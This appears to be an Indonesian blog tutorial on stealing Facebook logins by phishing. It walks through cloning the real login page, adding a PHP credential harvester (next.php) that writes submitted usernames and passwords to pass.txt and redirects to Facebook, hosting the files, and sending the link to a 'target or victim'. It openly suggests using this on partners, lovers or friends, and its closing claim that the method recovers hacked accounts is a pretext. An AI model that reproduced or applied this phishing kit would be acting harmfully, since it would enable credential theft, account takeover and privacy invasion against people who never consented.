Script Hack FB Tertarget CMD 2022

Script Hack FB Tertarget CMD
Script Hack FB Tertarget CMD - Pada kesempatan kali ini kami akan menerapkan salah satu cara hack dengan menggunakan metode script hack FB target CMD.

Hanya dengan memakai metode ini, anda bisa mengetahui username dan juga password orang lain tanpa harus diketahui oleh sik pemilik Facebook.

Contohnya saja anda akan memulai menerapkan kode hacker yang satu ini kepada pasangan, pacar atau sahabat anda sendiri untuk mengetahui username dan password FB yang mereka miliki.

Supaya hal seperti meminimalisir terjadinya kemudian hari, ketimbang kelamaan ayok simak script hack FB tertarget CMD sebagai berikut.


Script Hack FB Tertarget CMD


Script Hack FB Tertarget CMD

Script Hack FB Tertarget CMD
Script Hack FB Tertarget CMD
Hal yang dapat anda lakukan didalam mencoba metode ini, dimana anda harus paham lebih dulu tentang apa itu hosting.
Hosting sendiri disebut sebagai Web Hosting atau sewa hosting lebih tepatnya yakni wadah penyewaaan untuk menampung semua data-data yang nantinya diperlukan oleh sebuah website. Itu sebabnya anda bisa mengaksesnya melalui internet data yang ada temukan berupa file, gambar, email, aplikasi/program/script dan database.
Sehingga hosting ini nantinya akan dipakai, ketika anda aka menyimpan beberapa file untuk keperluan melakukan hack Facebook dengan memakai CMD.


Berikut langkah-langkah penggunaan Script hack FB tertarget CMD:


1. Save Halaman Login Facebook yang resmi dengan Script Hack FB Tertarget CMD

Hal yang harus anda lakukan pertama yakni anda harus mendownload Facebook HTML code khususnya untuk halaman login resmi di Facebook.

Berikut save halaman login Facebook yang resmi dengan script hack FB tertarget CMD:
  • Pertama-tama masuk ke halaman login resmi Facebook atau silahkan anda kunjungi melalui link berikut ini (http://www.facebook.com/login.php/).
  • Tinggal anda klik kanan di sembarang area pada halaman login, lalu anda pilih opsi Save As.
  • Kemudian anda simpan di satu folder baru supaya gampang dicari nantinya.


2. Download Script Hack FB Tertarget CMD

Hal yang harus anda lakukan selanjutnya yakni anda unduh lebih dulu script hack FB tertarget CMD ini, silahkan anda kunjungi melalui link berikut ini (Script Hack FB).


3. Menimpa Script HTML Halaman Login Resmi Facebook Lewat Script Hack FB Tertarget CMD

Jika sudah selesai mengunduhnya script hack FB tertarget CMD ini, maka hal yag hars anda lakukan yakni copy dan timpa file HTML halaman login resmi FB yang anda sudah peroleh dilangkah ke 1.


4. Membuat File Next.txt dengan Script Hack FB Tertarget CMD

Langkah cara script hack FB tertarget CMD ini, langsung saja anda copy script hack FB yang terdapat dibawah ke dalam Notepad kemudian simpan dengan nama next.php.

Jangan sampai anda lupa untuk menaruh file pada satu folder yang sama seperti langkah ke 1 diatas
&It;?phph header('Location:http://www.Facebook.com/login.php'); $handle = fopen('pass.txt', 'a'); foreach($_GET as $variable =&gt, $value) {fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?>


5. Membuat File Penampungan Username dan password Target dengan Script Hack FB Tertarget CMD

Langkah script hack FB tertarget CMD selanjutnya, langsung saja anda buat file berekstensi txt dengan memakai Notepad kemudian anda simpan menggunakan nama pass.txt.


6. Hosting Semua File Script Hack FB Tertarget CMD

Langkah script hack FB tertarget CMD, jika anda sudah selesai mengumpulkan file dari langkah ke 1 hingga ke 5 setelah itu anda lakukan hosting file-file ini.

Berikut daftar nama-nama file script hack yang nantinya diunggah atau hosting
  • Masuk Facebook_Facebook_Files.
  • Masuk Facebook_facebook.html.
  • next.php.
  • pass.text.

Tinggal anda unggah script hack FB ini lewat github untuk melalkukan hosting file tersebut, tentuya secara cuma-cuma alias gratis.


7. Script Hack FB Tertarget CMD dengan Menyebarkan Link Halaman Masuk Facebook

Jika anda sudah selesai menghosting file script hack FB tertarget CMD samai ke langkah 6, maka anda copy link halaman masuk Facebook hasil dari hosting barusan.

Pasalnya link halaman masuk Facebook yang anda peroleh tadi dari hasil melakukan hosting tersebut, silahkan anda kirimkan atau berikan kepada target atau korbannya.

Apa bila target login FB memakai link halaman fake login Facebook yang barusan anda kirimkan secara langsung username dan password FB akan tersimpan pada file passs.txt.


Akhir Kata

Demikianlah penjelasan yang telah kami sampaikan buat anda, tentu saja dengan informasi ini anda lebih paham mengenai script hack FB.

Bahkan cara ini lebih mudah untuk anda manfaatkan, buat mengembalikan Facebook yang telah di hack oleh orang yang tidak bertanggung jawab.

Pasalnya anda tinggal mengirimkan link ke sik target, maka anda bisa mengembalikan akun Facebook yang sudah dihack oleh orang lain.

Itulah seluruh isi artikel kita kali ini mengenai script hack FB tertarget CMD. Sekian dan semoga bermanfaat.
Dody S. Seseorang yang senang belajar dan sharing segala hal tentang teknologi.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel